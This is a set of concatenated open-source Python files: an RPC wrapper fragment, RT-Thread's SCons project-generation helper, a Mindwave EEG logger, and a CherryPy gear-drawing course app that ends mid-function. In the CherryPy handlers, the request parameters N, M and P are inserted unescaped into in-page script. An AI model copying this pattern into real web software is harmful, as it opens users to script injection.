def __init__(self, filename=None, deleteAfterLoad=False, index=None, name=None):
'''
Create a new descriptor
Parameters:
filename- the file to load
deleteAfterLoad- true to remove the file once loaded
index- Index of the data set to load if no name is specified
name- Name of the data set to load
        If neither name nor index is specified, load index 0
'''
self.filename = filename
self.deleteAfterLoad = deleteAfterLoad
self.index = index
self.name = name
#Use this class to wrap a Binary object, typically a str of bytes
import xmlrpclib
binarywrapper = xmlrpclib.Binary
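
# --- Illustrative usage sketch (added; 'proxy.someOverload' is hypothetical) ---
# typednone stands in for a typed Java null when an overloaded method must be
# disambiguated across the RPC boundary:
#
#     proxy.someOverload(typednone("java.lang.String"))   # acts like (String) null
#     desc = abstractdatasetdescriptor(filename="/tmp/data.h5", name="counts")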
|
erwindl0/python-rpc
|
org.eclipse.triquetrum.python.service/scripts/scisoftpy/python/pywrapper.py
|
Python
|
epl-1.0
| 2,506
|
import os
import sys
import string
import xml.etree.ElementTree as etree
from xml.etree.ElementTree import SubElement
from SCons.Script import *
BuildOptions = {}
Projects = []
Rtt_Root = ''
Env = None
fs_encoding = sys.getfilesystemencoding()
def _get_filetype(fn):
if fn.rfind('.c') != -1 or fn.rfind('.C') != -1 or fn.rfind('.cpp') != -1:
return 1
# assemble file type
if fn.rfind('.s') != -1 or fn.rfind('.S') != -1:
return 2
# header type
if fn.rfind('.h') != -1:
return 5
# other filetype
return 5
def splitall(loc):
"""
Return a list of the path components in loc. (Used by relpath_).
    The first item in the list will be either ``os.curdir``, ``os.pardir``, empty,
    or the root directory of loc (for example, ``/`` or ``C:\\``).
The other items in the list will be strings.
Adapted from *path.py* by Jason Orendorff.
"""
parts = []
while loc != os.curdir and loc != os.pardir:
prev = loc
loc, child = os.path.split(prev)
if loc == prev:
break
parts.append(child)
parts.append(loc)
parts.reverse()
return parts
def _make_path_relative(origin, dest):
"""
Return the relative path between origin and dest.
If it's not possible return dest.
If they are identical return ``os.curdir``
Adapted from `path.py <http://www.jorendorff.com/articles/python/path/>`_ by Jason Orendorff.
"""
origin = os.path.abspath(origin).replace('\\', '/')
dest = os.path.abspath(dest).replace('\\', '/')
#
orig_list = splitall(os.path.normcase(origin))
# Don't normcase dest! We want to preserve the case.
dest_list = splitall(dest)
#
if orig_list[0] != os.path.normcase(dest_list[0]):
# Can't get here from there.
return dest
#
# Find the location where the two paths start to differ.
i = 0
for start_seg, dest_seg in zip(orig_list, dest_list):
if start_seg != os.path.normcase(dest_seg):
break
i += 1
#
# Now i is the point where the two paths diverge.
# Need a certain number of "os.pardir"s to work up
# from the origin to the point of divergence.
segments = [os.pardir] * (len(orig_list) - i)
# Need to add the diverging part of dest_list.
segments += dest_list[i:]
if len(segments) == 0:
# If they happen to be identical, use os.curdir.
return os.curdir
else:
# return os.path.join(*segments).replace('\\', '/')
return os.path.join(*segments)
def xml_indent(elem, level=0):
i = "\n" + level*" "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
if not elem.tail or not elem.tail.strip():
elem.tail = i
for elem in elem:
xml_indent(elem, level+1)
if not elem.tail or not elem.tail.strip():
elem.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
def IARAddGroup(parent, name, files, project_path):
group = SubElement(parent, 'group')
group_name = SubElement(group, 'name')
group_name.text = name
for f in files:
fn = f.rfile()
name = fn.name
path = os.path.dirname(fn.abspath)
basename = os.path.basename(path)
path = _make_path_relative(project_path, path)
path = os.path.join(path, name)
file = SubElement(group, 'file')
file_name = SubElement(file, 'name')
file_name.text = ('$PROJ_DIR$\\' + path).decode(fs_encoding)
iar_workspace = '''<?xml version="1.0" encoding="iso-8859-1"?>
<workspace>
<project>
<path>$WS_DIR$\%s</path>
</project>
<batchBuild/>
</workspace>
'''
def IARWorkspace(target):
# make an workspace
workspace = target.replace('.ewp', '.eww')
out = file(workspace, 'wb')
xml = iar_workspace % target
out.write(xml)
out.close()
def IARProject(target, script):
project_path = os.path.dirname(os.path.abspath(target))
tree = etree.parse('template.ewp')
root = tree.getroot()
out = file(target, 'wb')
CPPPATH = []
CPPDEFINES = []
LINKFLAGS = ''
CCFLAGS = ''
# add group
for group in script:
IARAddGroup(root, group['name'], group['src'], project_path)
# get each include path
if group.has_key('CPPPATH') and group['CPPPATH']:
CPPPATH += group['CPPPATH']
# get each group's definitions
if group.has_key('CPPDEFINES') and group['CPPDEFINES']:
CPPDEFINES += group['CPPDEFINES']
# get each group's link flags
if group.has_key('LINKFLAGS') and group['LINKFLAGS']:
LINKFLAGS += group['LINKFLAGS']
# make relative path
paths = set()
for path in CPPPATH:
inc = _make_path_relative(project_path, os.path.normpath(path))
paths.add(inc) #.replace('\\', '/')
# setting options
options = tree.findall('configuration/settings/data/option')
for option in options:
# print option.text
name = option.find('name')
if name.text == 'CCIncludePath2':
for path in paths:
state = SubElement(option, 'state')
state.text = '$PROJ_DIR$\\' + path
if name.text == 'CCDefines':
for define in CPPDEFINES:
state = SubElement(option, 'state')
state.text = define
xml_indent(root)
out.write(etree.tostring(root, encoding='utf-8'))
out.close()
IARWorkspace(target)
def MDK4AddGroup(ProjectFiles, parent, name, files, project_path):
group = SubElement(parent, 'Group')
group_name = SubElement(group, 'GroupName')
group_name.text = name
for f in files:
fn = f.rfile()
name = fn.name
path = os.path.dirname(fn.abspath)
basename = os.path.basename(path)
path = _make_path_relative(project_path, path)
path = os.path.join(path, name)
files = SubElement(group, 'Files')
file = SubElement(files, 'File')
file_name = SubElement(file, 'FileName')
name = os.path.basename(path)
if ProjectFiles.count(name):
name = basename + '_' + name
ProjectFiles.append(name)
file_name.text = name.decode(fs_encoding)
file_type = SubElement(file, 'FileType')
file_type.text = '%d' % _get_filetype(name)
file_path = SubElement(file, 'FilePath')
file_path.text = path.decode(fs_encoding)
def MDK4Project(target, script):
project_path = os.path.dirname(os.path.abspath(target))
tree = etree.parse('template.uvproj')
root = tree.getroot()
out = file(target, 'wb')
out.write('<?xml version="1.0" encoding="UTF-8" standalone="no" ?>\n')
CPPPATH = []
CPPDEFINES = []
LINKFLAGS = ''
CCFLAGS = ''
ProjectFiles = []
# add group
    groups = tree.find('Targets/Target/Groups')
    if groups is None:  # bug fix: 'not groups' is also true for an existing empty element
        groups = SubElement(tree.find('Targets/Target'), 'Groups')
for group in script:
group_xml = MDK4AddGroup(ProjectFiles, groups, group['name'], group['src'], project_path)
        # get each include path
        if group.has_key('CPPPATH') and group['CPPPATH']:
            CPPPATH += group['CPPPATH']
        # get each group's definitions
        if group.has_key('CPPDEFINES') and group['CPPDEFINES']:
            CPPDEFINES += group['CPPDEFINES']
# get each group's link flags
if group.has_key('LINKFLAGS') and group['LINKFLAGS']:
if LINKFLAGS:
LINKFLAGS += ' ' + group['LINKFLAGS']
else:
LINKFLAGS += group['LINKFLAGS']
# remove repeat path
paths = set()
for path in CPPPATH:
inc = _make_path_relative(project_path, os.path.normpath(path))
paths.add(inc) #.replace('\\', '/')
paths = [i for i in paths]
paths.sort()
CPPPATH = string.join(paths, ';')
definitions = [i for i in set(CPPDEFINES)]
CPPDEFINES = string.join(definitions, ', ')
# write include path, definitions and link flags
IncludePath = tree.find('Targets/Target/TargetOption/TargetArmAds/Cads/VariousControls/IncludePath')
IncludePath.text = CPPPATH
Define = tree.find('Targets/Target/TargetOption/TargetArmAds/Cads/VariousControls/Define')
Define.text = CPPDEFINES
Misc = tree.find('Targets/Target/TargetOption/TargetArmAds/LDads/Misc')
Misc.text = LINKFLAGS
xml_indent(root)
out.write(etree.tostring(root, encoding='utf-8'))
out.close()
def MDKProject(target, script):
template = file('template.Uv2', "rb")
lines = template.readlines()
project = file(target, "wb")
project_path = os.path.dirname(os.path.abspath(target))
line_index = 5
# write group
for group in script:
lines.insert(line_index, 'Group (%s)\r\n' % group['name'])
line_index += 1
lines.insert(line_index, '\r\n')
line_index += 1
# write file
ProjectFiles = []
CPPPATH = []
CPPDEFINES = []
LINKFLAGS = ''
CCFLAGS = ''
# number of groups
group_index = 1
for group in script:
# print group['name']
        # get each include path
        if group.has_key('CPPPATH') and group['CPPPATH']:
            CPPPATH += group['CPPPATH']
# get each group's definitions
if group.has_key('CPPDEFINES') and group['CPPDEFINES']:
if CPPDEFINES:
CPPDEFINES += ';' + group['CPPDEFINES']
else:
CPPDEFINES += group['CPPDEFINES']
# get each group's link flags
if group.has_key('LINKFLAGS') and group['LINKFLAGS']:
if LINKFLAGS:
LINKFLAGS += ' ' + group['LINKFLAGS']
else:
LINKFLAGS += group['LINKFLAGS']
# generate file items
for node in group['src']:
fn = node.rfile()
name = fn.name
path = os.path.dirname(fn.abspath)
basename = os.path.basename(path)
path = _make_path_relative(project_path, path)
path = os.path.join(path, name)
if ProjectFiles.count(name):
name = basename + '_' + name
ProjectFiles.append(name)
lines.insert(line_index, 'File %d,%d,<%s><%s>\r\n'
% (group_index, _get_filetype(name), path, name))
line_index += 1
group_index = group_index + 1
lines.insert(line_index, '\r\n')
line_index += 1
# remove repeat path
paths = set()
for path in CPPPATH:
inc = _make_path_relative(project_path, os.path.normpath(path))
paths.add(inc) #.replace('\\', '/')
paths = [i for i in paths]
CPPPATH = string.join(paths, ';')
definitions = [i for i in set(CPPDEFINES)]
CPPDEFINES = string.join(definitions, ', ')
while line_index < len(lines):
if lines[line_index].startswith(' ADSCINCD '):
lines[line_index] = ' ADSCINCD (' + CPPPATH + ')\r\n'
if lines[line_index].startswith(' ADSLDMC ('):
lines[line_index] = ' ADSLDMC (' + LINKFLAGS + ')\r\n'
if lines[line_index].startswith(' ADSCDEFN ('):
lines[line_index] = ' ADSCDEFN (' + CPPDEFINES + ')\r\n'
line_index += 1
# write project
for line in lines:
project.write(line)
project.close()
def BuilderProject(target, script):
project = file(target, "wb")
project_path = os.path.dirname(os.path.abspath(target))
# write file
CPPPATH = []
CPPDEFINES = []
LINKFLAGS = ''
CCFLAGS = ''
# number of groups
group_index = 1
for group in script:
# print group['name']
# generate file items
for node in group['src']:
fn = node.rfile()
name = fn.name
path = os.path.dirname(fn.abspath)
path = _make_path_relative(project_path, path)
path = os.path.join(path, name)
project.write('%s\r\n' % path)
group_index = group_index + 1
project.close()
class Win32Spawn:
def spawn(self, sh, escape, cmd, args, env):
import subprocess
newargs = string.join(args[1:], ' ')
cmdline = cmd + " " + newargs
startupinfo = subprocess.STARTUPINFO()
#startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW
penv = {}
for key, value in env.iteritems():
penv[key] = str(value)
proc = subprocess.Popen(cmdline, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, startupinfo=startupinfo, shell = False, env=penv)
data, err = proc.communicate()
rv = proc.wait()
if data:
print data
if err:
print err
if rv:
return rv
return 0
def PrepareBuilding(env, root_directory, has_libcpu=False):
import SCons.cpp
import rtconfig
global BuildOptions
global Projects
global Env
global Rtt_Root
Env = env
Rtt_Root = root_directory
# patch for win32 spawn
if env['PLATFORM'] == 'win32' and rtconfig.PLATFORM == 'gcc':
win32_spawn = Win32Spawn()
win32_spawn.env = env
env['SPAWN'] = win32_spawn.spawn
# add program path
env.PrependENVPath('PATH', rtconfig.EXEC_PATH)
# parse rtconfig.h to get used component
PreProcessor = SCons.cpp.PreProcessor()
f = file('rtconfig.h', 'r')
contents = f.read()
f.close()
PreProcessor.process_contents(contents)
BuildOptions = PreProcessor.cpp_namespace
# add target option
AddOption('--target',
dest='target',
type='string',
help='set target project: mdk')
#{target_name:(CROSS_TOOL, PLATFORM)}
tgt_dict = {'mdk':('keil', 'armcc'),
'mdk4':('keil', 'armcc'),
'iar':('iar', 'iar')}
tgt_name = GetOption('target')
if tgt_name:
SetOption('no_exec', 1)
try:
rtconfig.CROSS_TOOL, rtconfig.PLATFORM = tgt_dict[tgt_name]
except KeyError:
            print 'Unknown target: %s. Available targets: %s' % \
                (tgt_name, ', '.join(tgt_dict.keys()))
sys.exit(1)
elif (GetDepend('RT_USING_NEWLIB') == False and GetDepend('RT_USING_NOLIBC') == False) \
and rtconfig.PLATFORM == 'gcc':
AddDepend('RT_USING_MINILIBC')
#env['CCCOMSTR'] = "CC $TARGET"
#env['ASCOMSTR'] = "AS $TARGET"
#env['LINKCOMSTR'] = "Link $TARGET"
# board build script
objs = SConscript('SConscript', variant_dir='build/bsp', duplicate=0)
Repository(Rtt_Root)
# include kernel
objs.append(SConscript('src/SConscript', variant_dir='build/src', duplicate=0))
# include libcpu
if not has_libcpu:
objs.append(SConscript('libcpu/SConscript', variant_dir='build/libcpu', duplicate=0))
# include components
objs.append(SConscript(os.path.join(Rtt_Root, 'components/SConscript'), variant_dir='build/components', duplicate=0))
return objs
def PrepareModuleBuilding(env, root_directory):
import SCons.cpp
import rtconfig
global BuildOptions
global Projects
global Env
global Rtt_Root
Env = env
Rtt_Root = root_directory
# add program path
env.PrependENVPath('PATH', rtconfig.EXEC_PATH)
def GetDepend(depend):
building = True
if type(depend) == type('str'):
if not BuildOptions.has_key(depend) or BuildOptions[depend] == 0:
building = False
elif BuildOptions[depend] != '':
return BuildOptions[depend]
return building
# for list type depend
for item in depend:
if item != '':
if not BuildOptions.has_key(item) or BuildOptions[item] == 0:
building = False
return building
def AddDepend(option):
BuildOptions[option] = 1
def MergeGroup(src_group, group):
src_group['src'] = src_group['src'] + group['src']
if group.has_key('CCFLAGS'):
if src_group.has_key('CCFLAGS'):
src_group['CCFLAGS'] = src_group['CCFLAGS'] + group['CCFLAGS']
else:
src_group['CCFLAGS'] = group['CCFLAGS']
if group.has_key('CPPPATH'):
if src_group.has_key('CPPPATH'):
src_group['CPPPATH'] = src_group['CPPPATH'] + group['CPPPATH']
else:
src_group['CPPPATH'] = group['CPPPATH']
if group.has_key('CPPDEFINES'):
if src_group.has_key('CPPDEFINES'):
src_group['CPPDEFINES'] = src_group['CPPDEFINES'] + group['CPPDEFINES']
else:
src_group['CPPDEFINES'] = group['CPPDEFINES']
if group.has_key('LINKFLAGS'):
if src_group.has_key('LINKFLAGS'):
src_group['LINKFLAGS'] = src_group['LINKFLAGS'] + group['LINKFLAGS']
else:
src_group['LINKFLAGS'] = group['LINKFLAGS']
    if group.has_key('LIBRARY'):
        if src_group.has_key('LIBRARY'):  # bug fix: the original called has_key on the value instead of on src_group
            src_group['LIBRARY'] = src_group['LIBRARY'] + group['LIBRARY']
        else:
            src_group['LIBRARY'] = group['LIBRARY']
def DefineGroup(name, src, depend, **parameters):
global Env
if not GetDepend(depend):
return []
group = parameters
group['name'] = name
if type(src) == type(['src1', 'str2']):
group['src'] = File(src)
else:
group['src'] = src
if group.has_key('CCFLAGS'):
Env.Append(CCFLAGS = group['CCFLAGS'])
if group.has_key('CPPPATH'):
Env.Append(CPPPATH = group['CPPPATH'])
if group.has_key('CPPDEFINES'):
Env.Append(CPPDEFINES = group['CPPDEFINES'])
if group.has_key('LINKFLAGS'):
Env.Append(LINKFLAGS = group['LINKFLAGS'])
objs = Env.Object(group['src'])
if group.has_key('LIBRARY'):
objs = Env.Library(name, objs)
# merge group
for g in Projects:
if g['name'] == name:
# merge to this group
MergeGroup(g, group)
return objs
# add a new group
Projects.append(group)
return objs
def GetCurrentDir():
conscript = File('SConscript')
fn = conscript.rfile()
name = fn.name
path = os.path.dirname(fn.abspath)
return path
def EndBuilding(target):
import rtconfig
Env.AddPostAction(target, rtconfig.POST_ACTION)
if GetOption('target') == 'mdk':
template = os.path.isfile('template.Uv2')
if template:
MDKProject('project.Uv2', Projects)
else:
template = os.path.isfile('template.uvproj')
if template:
MDK4Project('project.uvproj', Projects)
else:
print 'No template project file found.'
if GetOption('target') == 'mdk4':
MDK4Project('project.uvproj', Projects)
if GetOption('target') == 'iar':
IARProject('project.ewp', Projects)
def SrcRemove(src, remove):
if type(src[0]) == type('str'):
for item in src:
if os.path.basename(item) in remove:
src.remove(item)
return
for item in src:
if os.path.basename(item.rstr()) in remove:
src.remove(item)
def GetVersion():
import SCons.cpp
import string
rtdef = os.path.join(Rtt_Root, 'include', 'rtdef.h')
# parse rtdef.h to get RT-Thread version
    preprocessor = SCons.cpp.PreProcessor()
    f = file(rtdef, 'r')
    contents = f.read()
    f.close()
    preprocessor.process_contents(contents)
    def_ns = preprocessor.cpp_namespace
version = int(filter(lambda ch: ch in '0123456789.', def_ns['RT_VERSION']))
subversion = int(filter(lambda ch: ch in '0123456789.', def_ns['RT_SUBVERSION']))
if def_ns.has_key('RT_REVISION'):
revision = int(filter(lambda ch: ch in '0123456789.', def_ns['RT_REVISION']))
return '%d.%d.%d' % (version, subversion, revision)
return '0.%d.%d' % (version, subversion)
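
# --- Illustrative usage sketch (added; a typical RT-Thread SConscript, with
# the group name and flags chosen here for illustration) ---
#
#     from building import *
#     cwd = GetCurrentDir()
#     src = Glob('*.c')
#     group = DefineGroup('Applications', src, depend=[''], CPPPATH=[cwd])
#     Return('group')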
|
wuliaodew/RTT
|
tools/building.py
|
Python
|
gpl-2.0
| 20,383
|
import time
import bluetooth
from datetime import datetime
from MindwaveDataPoints import EEGPowersDataPoint, RawDataPoint, MeditationDataPoint, AttentionDataPoint
from MindwaveDataPointReader import MindwaveDataPointReader
if __name__ == '__main__':
mindwaveDataPointReader = MindwaveDataPointReader()
mindwaveDataPointReader.start()
out = ""
print "\n> Gravando dados EEG...\n"
while(True):
dataPoint = mindwaveDataPointReader.readNextDataPoint()
if (dataPoint.__class__ is MeditationDataPoint):
out = str(dataPoint)
#print dataPoint
elif (dataPoint.__class__ is AttentionDataPoint):
out = out + ";" + str(dataPoint)
#print dataPoint
#else (not dataPoint.__class__ is RawDataPoint):
elif (dataPoint.__class__ is EEGPowersDataPoint):
out = datetime.strftime(datetime.now(), '%d-%b-%Y %H:%M:%S')+";"+out + ";" + str(dataPoint) + "\n"
#print out
output_file = file('testCasesEEG.txt','a')
output_file.write(out)
out = ""
output_file.close()
print "\n> Fim da gravacao de dados EEG!\n"
|
gubertoli/hackrun-eeg
|
mindwave/read_mindwave_mobile.py
|
Python
|
gpl-2.0
| 1,077
|
#@+leo-ver=5-thin
#@+node:2014fall.20141212095015.1775: * @file wsgi.py
# coding=utf-8
# The source-encoding declaration above only takes effect on the first or second line of the file
################# (1) Module imports
# Import the cherrypy module; to use cherrypy on the OpenShift platform it must be installed via setup.py
#@@language python
#@@tabwidth -4
#@+<<declarations>>
#@+node:2014fall.20141212095015.1776: ** <<declarations>> (wsgi)
import cherrypy
# Import Python's built-in os module; being built in, it needs no installation via setup.py
import os
# Import the random module
import random
# Import the gear module
import gear
################# (2) Global variables
# Determine the directory containing this file; on Windows it ends with a trailing backslash
_curdir = os.path.join(os.getcwd(), os.path.dirname(__file__))
# 設定在雲端與近端的資料儲存目錄
if 'OPENSHIFT_REPO_DIR' in os.environ.keys():
# 表示程式在雲端執行
download_root_dir = os.environ['OPENSHIFT_DATA_DIR']
data_dir = os.environ['OPENSHIFT_DATA_DIR']
else:
# 表示程式在近端執行
download_root_dir = _curdir + "/local_data/"
data_dir = _curdir + "/local_data/"
'''以下為近端 input() 與 for 迴圈應用的程式碼, 若要將程式送到 OpenShift 執行, 除了採用 CherryPy 網際框架外, 還要轉為 html 列印
# 利用 input() 取得的資料型別為字串
toprint = input("要印甚麼內容?")
# 若要將 input() 取得的字串轉為整數使用, 必須利用 int() 轉換
repeat_no = int(input("重複列印幾次?"))
for i in range(repeat_no):
print(toprint)
'''
#@-<<declarations>>
#@+others
#@+node:2014fall.20141212095015.1777: ** class Hello
################# (3) Class definition section
# The following switches to the CherryPy web framework program structure
# Definition of the Hello class below; the object in the parentheses means Hello inherits all of object's features, including its methods and attributes
class Hello(object):
# Startup configuration for the Hello class
_cp_config = {
'tools.encode.encoding': 'utf-8',
'tools.sessions.on' : True,
'tools.sessions.storage_type' : 'file',
#'tools.sessions.locking' : 'explicit',
# sessions are stored as files, in the tmp directory under data_dir
'tools.sessions.storage_path' : data_dir+'/tmp',
# session lifetime is set to 60 minutes
'tools.sessions.timeout' : 60
}
#@+others
#@+node:2014fall.20141212095015.2004: *3* __init__
def __init__(self):
# Create the directories required when an instance is constructed
if not os.path.isdir(data_dir+'/tmp'):
os.mkdir(data_dir+'/tmp')
if not os.path.isdir(data_dir+"/downloads"):
os.mkdir(data_dir+"/downloads")
if not os.path.isdir(data_dir+"/images"):
os.mkdir(data_dir+"/images")
#@+node:2014fall.20141212095015.1778: *3* index_orig
# The @cherrypy.expose line is a decorator, marking the member method that follows as directly executable by users via a URL
@cherrypy.expose
# index is the built-in (default) member method of a CherryPy class; when the user specifies no method in the URL, the system runs index first
# Methods taking self are class member methods; Python passes the object's contents between member methods through this self
def index_orig(self, toprint="Hello World!"):
return toprint
#@+node:2014fall.20141212095015.1779: *3* hello
@cherrypy.expose
def hello(self, toprint="Hello World!"):
return toprint
#@+node:2014fall.20141215194146.1791: *3* index
@cherrypy.expose
def twoDgear(self, guess=None):
# Store the standard answer in the answer session slot
theanswer = random.randint(1, 100)
thecount = 0
# Store the answer and the attempt counter in session variables
cherrypy.session['answer'] = theanswer
cherrypy.session['count'] = thecount
# Print the hypertext form for user input
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- load brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- start brython() -->
<body onload="brython()">
<form method=POST action=doCheck>
Enter the integer you guessed: <input type=text name=guess><br />
<input type=submit value=send>
</form>
<hr>
<!-- The following embeds a Brython program in the page -->
<script type="text/python">
from browser import document, alert
def echo(ev):
alert(document["zone"].value)
# Bind the object named mybutton in the document to the echo function via the click event
document['mybutton'].bind('click',echo)
</script>
<input id="zone"><button id="mybutton">click !</button>
<hr>
<!-- canvas drawing program below -->
<script type="text/python">
# import document from browser
from browser import document
import math
# the drawing canvas is the canvas named plotarea
# Chinese variable names are used below
畫布 = document["plotarea"]
ctx = 畫布.getContext("2d")
# Draw a line in red
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(0, 500)
ctx.strokeStyle = "red"
ctx.stroke()
# Draw another line in blue
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 0)
ctx.strokeStyle = "blue"
ctx.stroke()
# Draw another line in green
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 500)
ctx.strokeStyle = "green"
ctx.stroke()
# Draw a circle in black
ctx.beginPath()
ctx.lineWidth = 3
ctx.strokeStyle = "black"
ctx.arc(250,250,50,0,2*math.pi)
ctx.stroke()
</script>
<canvas id="plotarea" width="800" height="600"></canvas>
</body>
</html>
'''
return outstring
#@+node:2015.20150330144929.1713: *3* twoDgear
@cherrypy.expose
# N is the number of teeth, M is the module, P is the pressure angle
def index(self, N=None, M=None, P=None):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- load brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- start brython() -->
<body onload="brython()">
<form method=POST action=mygeartest>
<p>Student ID: 40123207
<p>Number of teeth:
<p><select name=N>
<option>10
<option>20
<option>30
<option>40
<option>50
</select>
<p>Module:
<p><select name=M>
<option>2
<option>3
<option>4
<option>5
<option>6
<option>7
<option>8
<option>9
<option>10
</select>
<p>Pressure angle:
<p><select name=P>
<option>14.5
<option>15.0
<option>15.5
<option>16.0
<option>16.5
<option>17.0
<option>17.5
<option>18.0
<option>18.5
<option>19.0
<option>19.5
<option>20.0
</select>
<br />
<p><input type=submit value=send>
</form>
</body>
</html>
'''
return outstring
#@+node:2015.20150331094055.1733: *3* threeDgear
@cherrypy.expose
# N is the number of teeth, M is the module, P is the pressure angle
def threeDgear(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- load brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- start brython() -->
<body onload="brython()">
<form method=POST action=do3Dgear>
Number of teeth: <input type=text name=N><br />
Module: <input type=text name=M><br />
Pressure angle: <input type=text name=P><br />
<input type=submit value=send>
</form>
</body>
</html>
'''
return outstring
#@+node:2015.20150330144929.1762: *3* do2Dgear
@cherrypy.expose
# N is the number of teeth, M is the module, P is the pressure angle
def do2Dgear(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- load brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- start brython() -->
<body onload="brython()">
<!-- canvas drawing program below -->
<script type="text/python">
# import document from browser
from browser import document
import math
# the drawing canvas is the canvas named plotarea
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
# Draw a line in green
ctx.beginPath()
ctx.lineWidth = 3
'''
outstring += '''
ctx.moveTo('''+str(N)+","+str(M)+")"
outstring += '''
ctx.lineTo(0, 500)
ctx.strokeStyle = "green"
ctx.stroke()
# Draw another line in blue
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 0)
ctx.strokeStyle = "blue"
ctx.stroke()
# Draw another line in black
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 500)
ctx.strokeStyle = "black"
ctx.stroke()
# Draw a circle in red
ctx.beginPath()
ctx.lineWidth = 3
ctx.strokeStyle = "red"
ctx.arc(250,250,50,0,2*math.pi)
ctx.stroke()
</script>
<canvas id="plotarea" width="800" height="600"></canvas>
</body>
</html>
'''
return outstring
#@+node:2015.20150331094055.1735: *3* do3Dgear
@cherrypy.expose
# N is the number of teeth, M is the module, P is the pressure angle
def do3Dgear(self, N=20, M=5, P=15):
outstring = '''
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- load brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- start brython() -->
<body onload="brython()">
<!-- canvas drawing program below -->
<script type="text/python">
# import document from browser
from browser import document
import math
# the drawing canvas is the canvas named plotarea
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
# Draw a line in red
ctx.beginPath()
ctx.lineWidth = 3
'''
outstring += '''
ctx.moveTo('''+str(N)+","+str(M)+")"
outstring += '''
ctx.lineTo(0, 500)
ctx.strokeStyle = "red"
ctx.stroke()
# Draw another line in blue
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 0)
ctx.strokeStyle = "blue"
ctx.stroke()
# Draw another line in green
ctx.beginPath()
ctx.lineWidth = 3
ctx.moveTo(0, 0)
ctx.lineTo(500, 500)
ctx.strokeStyle = "green"
ctx.stroke()
# Draw a circle in black
ctx.beginPath()
ctx.lineWidth = 3
ctx.strokeStyle = "black"
ctx.arc(250,250,50,0,2*math.pi)
ctx.stroke()
</script>
<canvas id="plotarea" width="800" height="600"></canvas>
</body>
</html>
'''
return outstring
#@+node:2015.20150330144929.1765: *3* mygeartest
@cherrypy.expose
# N is the number of teeth, M is the module, P is the pressure angle
def mygeartest(self, N=50, M=5, P=20):
D = int(N)*int(M)
outstring = '''
<!DOCTYPE html>
<html>
<head>
Your gear is drawn below.
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<!-- load brython.js -->
<script type="text/javascript" src="/static/Brython3.1.1-20150328-091302/brython.js"></script>
<script src="/static/Cango2D.js" type="text/javascript"></script>
<script src="/static/gearUtils-04.js" type="text/javascript"></script>
</head>
<!-- start brython() -->
<body onload="brython()">
<!-- canvas drawing program below -->
<script type="text/python">
# import document from browser
from browser import document
from math import *
# prepare to draw on the canvas with id="plotarea"
canvas = document["plotarea"]
ctx = canvas.getContext("2d")
def create_line(x1, y1, x2, y2, width=3, fill="red"):
ctx.beginPath()
ctx.lineWidth = width
ctx.moveTo(x1, y1)
ctx.lineTo(x2, y2)
ctx.strokeStyle = fill
ctx.stroke()
# After importing the math functions, the circle ratio is pi
# deg is the degree-to-radian conversion factor
deg = pi/180.
#
# Below are the spur-gear drawing and the main tkinter canvas drawing
#
# Define a drawing function for a spur gear
# midx is the x coordinate of the gear center
# midy is the y coordinate of the gear center
# rp is the pitch-circle radius, n is the number of teeth
def 齒輪(midx, midy, rp, n, 顏色):
# Make the angle conversion factor a global variable
global deg
# The gear involute is drawn as 15 line segments
imax = 15
# Draw a straight line on the given canvas, from the center to the top of the pitch circle on the y axis
create_line(midx, midy, midx, midy-rp)
# Draw the rp circle; the circle-drawing function is not defined yet
#create_oval(midx-rp, midy-rp, midx+rp, midy+rp, width=2)
# a is the module (the metric tooth size); the module is the pitch diameter divided by the number of teeth
# the module also equals the addendum height
a=2*rp/n
# d is the dedendum, 1.157 or 1.25 times the module; 1.25 is used here
d=2.5*rp/n
# ra is the outer (tip) radius of the gear
ra=rp+a
print("ra:", ra)
# Draw the ra circle; the circle-drawing function is not defined yet
#create_oval(midx-ra, midy-ra, midx+ra, midy+ra, width=1)
# rb is the base-circle radius of the gear
# the base circle is the reference circle from which the involute teeth grow
rb=rp*cos('''+str(P)+'''*deg)
